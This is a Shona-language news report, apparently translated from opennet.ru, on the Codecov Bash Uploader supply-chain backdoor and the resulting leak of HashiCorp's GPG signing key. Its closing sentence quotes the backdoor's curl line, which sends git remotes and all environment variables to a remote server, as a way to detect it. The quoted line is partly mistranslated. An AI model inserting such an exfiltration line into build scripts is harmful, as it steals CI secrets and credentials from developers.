HashiCorp, inozivikanwa nekugadzira yakavhurika sosi maturusi Vagrant, Packer, Nomad uye Terraform, yakazivisa kuvuza kweyakavanzika GPG kiyi inoshandiswa kugadzira siginecha yedhijitari inosimbisa kuburitswa. Vapambi vakawana kiyi yeGPG vanogona kuita shanduko dzakavandika kune zvigadzirwa zveHashiCorp nekuzvisimbisa nesignature chaiyo yedhijitari. Panguva imwecheteyo, kambani yakataura kuti panguva yekuongorora, hapana kana mitsva yekuedza kuita shanduko yakadai yakaonekwa.
Parizvino, kiyi yeGPG yakakanganiswa yakabviswa uye kiyi nyowani yakaunzwa munzvimbo yayo. Dambudziko rakangobata ongororo uchishandisa iyo SHA256SUM uye SHA256SUM.sig mafaera, uye haina kukanganisa kugadzirwa kwemasiginecha edhijitari yeLinux DEB uye RPM mapakeji akapihwa kuburikidza nereleases.hashicorp.com, pamwe nekuburitsa nzira dzekusimbisa macOS neWindows (AuthentiCode) .
Kubvinza uku kwakaitika nekuda kwekushandiswa kweCodecov Bash Uploader (codecov-bash) script mune zvivakwa, zvakagadzirirwa kudhawunirodha mishumo yekuvhara kubva kune inoenderera mberi yekubatanidza masisitimu. Munguva yekurwiswa kwekambani yeCodecov, imba yekuseri yakavigwa mune yakatsanangurwa script, kuburikidza iyo mapassword uye encryption makiyi akatumirwa kune vanorwisa server.
Kubira, vapambi vakatora mukana wekukanganisa mukugadzira iyo Codecov Docker mufananidzo, iyo yakavabvumira kuburitsa data yekuwana kuGCS (Google Cloud Storage), inodiwa kuita shanduko kune Bash Uploader script yakagoverwa kubva kucodecov.io. website. Shanduko idzi dzakaitwa kumashure muna Ndira 31, dzakaramba dzisingaonekwe kwemwedzi miviri uye dzakabvumira vanorwisa kuti vatore ruzivo rwakachengetwa muvatengi vanoenderera mberi yekubatanidza system nharaunda. Uchishandisa iyo yakawedzera hutsinye kodhi, vanorwisa vanogona kuwana ruzivo nezve yakaedzwa Git repository uye ese akasiyana nharaunda, kusanganisira tokens, encryption kiyi uye mapassword anopfuudzwa kune anoenderera ekubatanidza masisitimu kuronga kuwana kodhi yekushandisa, repositori uye masevhisi akadai seAmazon Web Services uye GitHub.
Pamusoro pekufona kwakananga, iyo Codecov Bash Uploader script yakashandiswa sechikamu chevamwe vanoisa, seCodecov-action (Github), Codecov-circleci-orb uye Codecov-bitrise-nhanho, iyo vashandisi vanobatwawo nedambudziko. Vese vashandisi vecodecov-bash uye zvigadzirwa zvine hukama vanokurudzirwa kuongorora zvivakwa zvavo, pamwe nekuchinja mapassword uye encryption kiyi. Unogona kutarisa kuvepo kwebackdoor mune script nekuvapo kwemutsara curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /upload/v2 || chokwadi
Source: opennet.ru